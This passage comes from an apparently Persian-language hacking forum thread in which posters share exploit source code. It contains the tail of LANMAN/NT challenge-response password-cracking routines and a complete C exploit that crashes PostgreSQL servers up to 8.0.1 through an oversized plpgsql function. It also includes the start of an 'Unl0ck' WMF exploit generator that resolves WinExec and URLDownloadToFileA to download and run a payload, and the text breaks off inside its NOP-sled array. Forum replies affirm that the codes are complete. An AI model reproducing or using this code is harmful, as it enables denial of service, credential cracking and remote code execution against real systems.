    				}
    			}
    		  }
    	  }
    
    	  /* second half is matched against bytes 8..15 of the stored hash */
    	  if (strlen(index->second_half) == 0){
    		if (memcmp(&index->lmhashb[8], half_hash, 8) == 0){
    			  strncpy(index->second_half, brute_str, 7);
    #ifdef _DEBUG
    			  printf("snagged second half in round %d\n", iter);
    			  fflush(NULL);
    #endif
    		}
    	  }
      }
      /* NOTE(review): strncpy(.., 7) writes no terminator for a 7-character
         candidate; the strlen()/strncat() calls here assume first_half,
         second_half and lmpasswd are larger than 7 bytes and were zeroed
         beforehand - their declarations are not visible, confirm */
      if (!(index->under7)){
        if ((strlen(index->first_half) > 0) && (strlen(index->second_half) > 0)){
    	  strncpy(index->lmpasswd, index->first_half, 7);
    	  strncat(&index->lmpasswd[7], index->second_half, 7);
    	  index->lmdone = 1;
    	  positive = 1;
        }
      }
      index = index->next;
      }
      return(positive);
    }
    
    /*
     * Test one candidate against captured LANMAN challenge/response pairs.
     *
     * head      - first list entry; every entry up to the end is checked
     * brute_str - candidate password
     *
     * Returns 1 if at least one entry's lmresp_b matched, else 0.  On a
     * match the entry receives the candidate (14 bytes are copied from
     * brute_str), the 16-byte hash, and lmdone = 1.
     *
     * The expected response is derived only from the candidate's hash and
     * the entry's server_chall, so a recorded exchange can be checked
     * without any further contact with the server.
     */
    int lm_check_sniff(struct user_struct *head, char *brute_str){
      struct user_struct *entry;
      char lm_hash[16];
      char padded_hash[21];
      char expected[24];
      int hit = 0;

      for (entry = head; entry != NULL; entry = entry->next){
        /* 16 hash bytes followed by five zero bytes */
        memset(padded_hash, '\0', sizeof(padded_hash));
        full_lanman(lm_hash, brute_str);
        memcpy(padded_hash, lm_hash, sizeof(lm_hash));
        E_P24(padded_hash, entry->server_chall, expected);

        if (memcmp(entry->lmresp_b, expected, sizeof(expected)) != 0)
          continue;

        memcpy(entry->lmpasswd, brute_str, 14);
        memcpy(entry->lmhashb, lm_hash, sizeof(lm_hash));
        entry->lmdone = 1;
        hit = 1;
      }
      return hit;
    }
    
    /*
     * Test one 16-byte NT hash against the captured NT response of a single
     * entry.  Unlike lm_check_sniff() this does not walk the list: only
     * `head` itself is examined.
     *
     * head   - entry holding server_chall and ntresp_b
     * nthash - 16-byte candidate hash
     *
     * Returns 1 and stores the hash (nthashb, ntdone = 1) on a match,
     * otherwise 0.
     */
    int nt_check_sniff(struct user_struct *head, char *nthash){
      char padded_hash[21];
      char expected[24];

      /* 16 hash bytes followed by five zero bytes */
      memset(padded_hash, '\0', sizeof(padded_hash));
      memcpy(padded_hash, nthash, 16);
      E_P24(padded_hash, head->server_chall, expected);

      if (memcmp(head->ntresp_b, expected, sizeof(expected)) != 0)
        return 0;

      memcpy(head->nthashb, nthash, 16);
      head->ntdone = 1;
      return 1;
    }
    
    /*
     * Byte-wise comparison of two buffers over `len` bytes.
     *
     * Returns the memcmp() result unchanged: 0 when the buffers are equal,
     * non-zero otherwise - so despite the name, "same" is signalled by 0.
     */
    int issame(char *one, char *two, int len){
      const int diff = memcmp(one, two, len);

      return diff;
    }


    Source : HackersClub ,@stake ,NewYork Times MGZ
    Interpreter : محمد مسافر



  11. #11


    خواننده شناسه تصویری !!!!!!!!!!!!!!!

    Icon9 PostgreSQL Remote Reboot

    کد HTML:
    /* PostgreSQL Remote Reboot <=8.0.1 
     * written by ChoiX [choix@unl0ck.org]
     * (c) unl0ck team
     *	info: The server can be rebooted only if the plpgsql language is enabled.
     *		To compilate exploit you should have "libpq" library on your box 
     *		and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include  -L/usr/local/pgsql/lib -lpq
     *		Root exploits will be released later, coz now it's very dangerous to release it.
     *
     *
     *
     */
    #include <stdio.h>
    #include <getopt.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <libpq-fe.h>
    
    /* Connection defaults, used by main() when -P / -d are not given. */
    #define DEFAULT_PORT "5321"
    #define DEFAULT_DB "postgresql"
    /* Names substituted into the generated statement by make_str(). */
    #define FUNC_NAME "uKt_test"
    #define TABLE_NAME "unl0ck_table" 
    
    /* Statement buffer: filled by make_str(), passed to PQexec() in main(). */
    char str[4000];
    /* printf-style fragments of a CREATE FUNCTION ... LANGUAGE plpgsql
       statement; make_str() formats them one by one and appends to str. */
    char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$\n";
    char declare[] = "DECLARE\n";
    char com[] = "\t--%\n";
    char varible_REC[] = "\trec RECORD;\n";
    char varible_var[] = "\tvar%d varchar := \'BBBB\';\n";
    char begin[] = "BEGIN\n";
    char select_1[] = "SELECT INTO rec FROM %s WHERE\n";
    char select_2[] = "var%d = AAAA AND\n";
    char select_3[] = "var1029 = AAAA;\n";
    char end[] = "END\n";
    char finish[] = "$$ LANGUAGE plpgsql\n";
    
    
    /*
     * Print the banner, the option summary and the built-in defaults, then
     * terminate the process with status 0.
     *
     * name - program name shown in the usage line (argv[0] at the call sites)
     */
    void usage(char *name){
    /* fixed banner lines */
    fputs("PostgreSQL Remote DoS <=8.0.1\n", stdout);
    fputs("writen by ChoiX [choix@unl0ck.org]\n", stdout);
    fputs("(c) Unl0ck Research Team [info@unl0ck.org]\n", stdout);

    /* option summary and defaults */
    printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] \n", name);
    printf("Default port = %s\nDefault dbname = %s\n", DEFAULT_PORT, DEFAULT_DB);

    exit(0);
    }
    
    int make_str();
    
    /*
     * Command-line driver: parses the options, logs in to the database with
     * the supplied account, submits the statement built by make_str() and
     * reports the connection state afterwards.
     *
     * Host, user name and password are mandatory (usage() is called when any
     * of them is missing), so the program acts only through an authenticated
     * database session; port and database name fall back to DEFAULT_PORT and
     * DEFAULT_DB.
     *
     * The process exits through exit() on every path: status 1 when the
     * login fails, status 0 otherwise.
     */
    int main(int argc, char *argv[]){
    char opt;
    char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
    struct hostent *he;
    PGconn *conn;
    PGresult *res;
    
    /* -H host, -P port, -u user, -p password, -d database */
    while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
    	switch(opt){
    		case 'H':
    			host = optarg;
    			break;
    		case 'P':
    			port = optarg;
    			break;
    		case 'u':
    			user = optarg;
    			break;
    		case 'p':
    			password = optarg;
    			break;
    		case 'd':
    			dbname = optarg;
    			break;
    		default:
    			usage(argv[0]);
    			break;
    	}
    }
    if(host == NULL) usage(argv[0]);
    if(user == NULL) usage(argv[0]);
    if(password == NULL) usage(argv[0]);
    if(port == NULL) port = DEFAULT_PORT; 
    if(dbname == NULL) dbname = DEFAULT_DB;
    
    printf("\tPostgreSQL Remote DoS <=8.0.1\n");
    printf("[*] Host/Port: %s/%s\n", host, port);
    /* the supplied password is echoed to stdout in clear text here */
    printf("[*] DBname/User/Password: %s/%s/%s\n", dbname, user, password); 
    
    /* ordinary libpq login; nothing happens before authentication succeeds */
    conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
    if(PQstatus(conn) == CONNECTION_BAD){
    	PQfinish(conn);
    	printf("[-] Cannot connect to the database\n");
    	exit(1);
    }
    printf("[+] Connected to the database\n");
    
    /* build the statement into the global str and send it as one query */
    make_str();
    printf("[+] Command has been generated\n");
    res = PQexec(conn, str);
    /* the result status only controls this message, not the verdict below */
    if (PQresultStatus(res) == PGRES_TUPLES_OK){
    	printf("[+] Command has been sent\n");
    }
    /* the verdict is inferred solely from the connection having gone bad
       after the query; both branches exit with status 0 */
    if(PQstatus(conn) == CONNECTION_BAD){
    	printf("[+] Server has been rebooted\n");
    	exit(0);
    } else {
    	printf("[-] Server hasnt been rebooted\n");
    	exit(0);
    }
    }
    
    /*
     * Assemble the statement text in the global buffer str.
     *
     * Each template fragment is formatted into the 100-byte scratch buffer
     * temp and appended to str, in the order of the calls below.  The two
     * loops emit 1029 variable declarations (var0..var1028) and 1028
     * "varN = AAAA AND" terms; the function and table names come from
     * FUNC_NAME and TABLE_NAME.
     *
     * Takes no arguments and always returns 0.
     */
    int make_str(){
    char temp[100];
    int i;
    int len = sizeof(temp) -1;
    
    //write char create[]
    snprintf(temp, len, create, FUNC_NAME); 
    strcpy(str,temp);
    //write char declare[] 
    snprintf(temp, len, begin);
    strcat(str, temp);
    //write char varible_REC[]
    snprintf(temp, len, varible_REC);
    strcat(str, temp);
    //write char varible_var[]
    for(i = 0;i < 1029;i++){
    	snprintf(temp, len, varible_var, i);
    	strcat(str, temp);
    }
    //write char begin[]
    snprintf(temp, len, begin);
    strcat(str, temp);
    //write char select_1[]
    snprintf(temp, len, select_1, TABLE_NAME);
    strcat(str, temp);
    //write char select_2[]
    for(i = 0;i < 1028;i++){
    	snprintf(temp, len, select_2, i);
    	strcat(str, temp);
    }
    //write char select_3[]
    snprintf(temp, len, select_3);
    strcat(str, temp);
    //write char end[]
    snprintf(temp, len, temp);
    strcat(str, temp);
    //write char finish[]
    snprintf(temp, len, finish);
    strcat(str,temp);
    
    return 0;
    }
    




  12. #12
    نام حقيقي: Alireza Khosravi

    عضو عادی شناسه تصویری irarkh

    Icon10

    كم كم داره تبديل به تاپيك مرجع ميشه. اين كدها كاملند يا ناقص ؟



  13. #13


    خواننده شناسه تصویری !!!!!!!!!!!!!!!
    نقل قول نوشته اصلی توسط irarkh
    كم كم داره تبديل به تاپيك مرجع ميشه. اين كدها كاملند يا ناقص ؟
    =-=-=-=-=-=-=-=-
    کامل هستند.



  14. #14


    خواننده شناسه تصویری !!!!!!!!!!!!!!!

    Icon10 WMF Exploit Generator (This sploit is now full shit, so kiddies party has been star)

    کد HTML:
    /*
    \
    /		WMF nDay download() Exploit Generator
    \		       by Unl0ck Research Team
    /
    \
    /     greetz: 
    			rst/ghc { ed, uf0, fost },
    			uKt { choix, nekd0, payhash, antq }, 
    			blacksecurity { #black } , 
    			0x557 { kaka, swan, sam, nolife }, 
    			sowhat, tty64 { izik };
    
    	This sploit is now full shit, so... 
    	kiddies party has been started!!!
    
    urs, 
    darkeagle
    \
    /
    */
    
    #include <stdio.h>
    #include <winsock2.h>
    
    #pragma comment(lib, "ws2_32")
    
    // Use for find the ASM code
    #define PROC_BEGIN                    __asm _emit 0x90 __asm  _emit 0x90\
                                          __asm _emit 0x90 __asm  _emit 0x90\
                                          __asm _emit 0x90 __asm  _emit 0x90\
                                          __asm _emit 0x90 __asm  _emit 0x90
    #define PROC_END                       PROC_BEGIN
    #define SEARCH_STR                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    #define SEARCH_LEN                     8
    #define MAX_SC_LEN                     2048
    #define HASH_KEY                       13
    
    // Define Decode Parameter
    #define DECODE_LEN                     21
    #define SC_LEN_OFFSET                  7
    #define ENC_KEY_OFFSET                 11
    #define ENC_KEY                        0xff
    
    
    // Define Function Addr
    #define ADDR_LoadLibraryA              [esi]
    #define ADDR_GetSystemDirectoryA       [esi+4]
    #define ADDR_WinExec                   [esi+8]
    #define ADDR_ExitProcess               [esi+12]
    #define ADDR_URLDownloadToFileA        [esi+16]
    
    // Need functions
    unsigned char functions[100][128] =
    {                                           // [esi] stack layout
       // kernel32 4                           // 00 kernel32.dll
       {"LoadLibraryA"},                       //    [esi]
       {"GetSystemDirectoryA"},                //    [esi+4]
       {"WinExec"},                            //    [esi+8]
       {"ExitProcess"},                        //    [esi+12]
       // urlmon  1                            // 01 urlmon.dll
       {"URLDownloadToFileA"},                 //    [esi+16]
       {""},
    };
    
    
    
    unsigned char head1[512] = {
    	0x01, 0x00, 0x09, 0x00, 0x00, 0x03, 0x52, 0x1F, 0x00, 0x00, 0x06, 0x00, 0x3D, 0x00, 0x00, 0x00,
    	0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x18, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
    	0xFF, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x85, 0x00,
    	0xD0, 0x02, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF,
    	0xFF, 0xFF, 0x02, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x23, 0x00,
    	0xFF, 0xFF, 0xFF, 0xFF, 0x04, 0x00, 0x1B, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x14, 0x00, 0x20, 0x00,
    	0xB8, 0x00, 0x32, 0x06, 0x00, 0x00, 0xFF, 0xFF, 0x4F, 0x00, 0x14, 0x00, 0x00, 0x00, 0x4D, 0x00,
    	0x69, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x0A, 0x00, 0x54, 0x4E,
    	0x50, 0x50, 0x00, 0x00, 0x02, 0x00, 0xF4, 0x03, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00,
    	0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x03, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x26, 0x06,
    	0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00,
    	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0B, 0x02, 0x00, 0x00,
    	0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0C, 0x02, 0xD0, 0x02, 0xC0, 0x03, 0x04, 0x00, 0x00, 0x00,
    	0x04, 0x01, 0x0D, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00,
    	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02,
    	0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
    	0x1D, 0x06, 0x21, 0x00, 0xF0, 0x00, 0xD0, 0x02, 0xC0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0xFF, 0xFF,
    	0xFF, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0xF0, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    	0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x10, 0x00,
    	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x16, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x47, 0x00,
    	0x00, 0x00, 0x8F, 0x02, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0xC1, 0x02, 0x00, 0x00, 0x08, 0x00,
    	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x06, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x0D, 0x00,
    	0x00, 0x00, 0xFB, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    	0x00, 0x01, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0x00, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00,
    	0x26, 0x06, 0x09, 0x00, 0x16, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
    };
    
    unsigned char head2[15220] = {
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
